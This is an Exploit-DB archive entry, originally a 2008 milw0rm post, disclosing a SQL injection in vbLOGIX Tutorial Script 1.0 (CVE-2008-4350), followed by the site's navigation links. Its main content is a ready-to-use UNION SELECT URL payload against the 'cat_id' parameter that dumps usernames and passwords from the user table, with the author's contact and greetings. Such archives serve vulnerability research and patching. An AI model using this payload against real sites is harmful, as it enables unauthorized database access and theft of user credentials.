vbLOGIX Tutorial Script 1.0 - 'cat_id' SQL Injection

EDB-ID:

6446

CVE:

2008-4350

EDB Verified:

Author:

FIREH4CK3R

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-09-12

Vulnerable App:

#=====================================================================================================
#vbLOGIX Tutorial Script <= v1.0 (cat_id) Remote SQL Injection Exploit
#=====================================================================================================
#
#
#Venedor site : http://www.vblogix.com/
#
#Demo site: http://www.vb-demo.com/
#
#Version : v1.0
#
#=====================================================================================================
#
#DORK : no have
#
#
#Exploit :
#--------------------------------
# main.php?act=list&cat_id=-1+UNION+ALL+SELECT+concat(usrname,0x3a,psswd)+FROM+t_user/*
#
#=====================================================================================================
#Discoverd By : FIREH4CK3R
#
#Contact : firehacker_msn[at]hotmail.com
#
#Greetz To : FIREH4CK3R, Sh0rtKiller, Park, Dark, SecurityBR
#
#
#=====================================================================================================

# milw0rm.com [2008-09-12]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services